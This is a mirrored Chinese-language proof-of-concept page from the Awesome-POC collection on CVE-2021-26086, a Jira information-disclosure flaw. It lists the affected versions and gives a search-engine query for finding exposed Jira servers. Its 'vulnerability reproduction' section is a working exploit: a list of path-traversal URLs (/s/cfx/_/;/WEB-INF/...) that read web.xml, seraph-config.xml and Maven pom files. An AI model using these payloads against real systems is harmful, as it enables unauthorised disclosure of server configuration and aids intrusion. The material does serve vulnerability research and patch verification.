mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 04:18:39 +00:00
39 lines
967 B
Markdown
39 lines
967 B
Markdown
# Atlassian Jira 敏感信息泄露 CVE-2021-26086
|
||
|
||
## 漏洞描述
|
||
|
||
JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
|
||
|
||
参考链接:
|
||
|
||
- https://jira.atlassian.com/browse/JRASERVER-72695
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
version < 8.5.14
|
||
8.6.0 ≤ version < 8.13.6
|
||
8.14.0 ≤ version < 8.16.1
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
app="ATLASSIAN-JIRA"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
poc:
|
||
|
||
```
|
||
/s/cfx/_/;/WEB-INF/web.xml
|
||
/s/cfx/_/;/WEB-INF/decorators.xml
|
||
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
|
||
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
|
||
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
|
||
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
|
||
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
|
||
```
|
||
|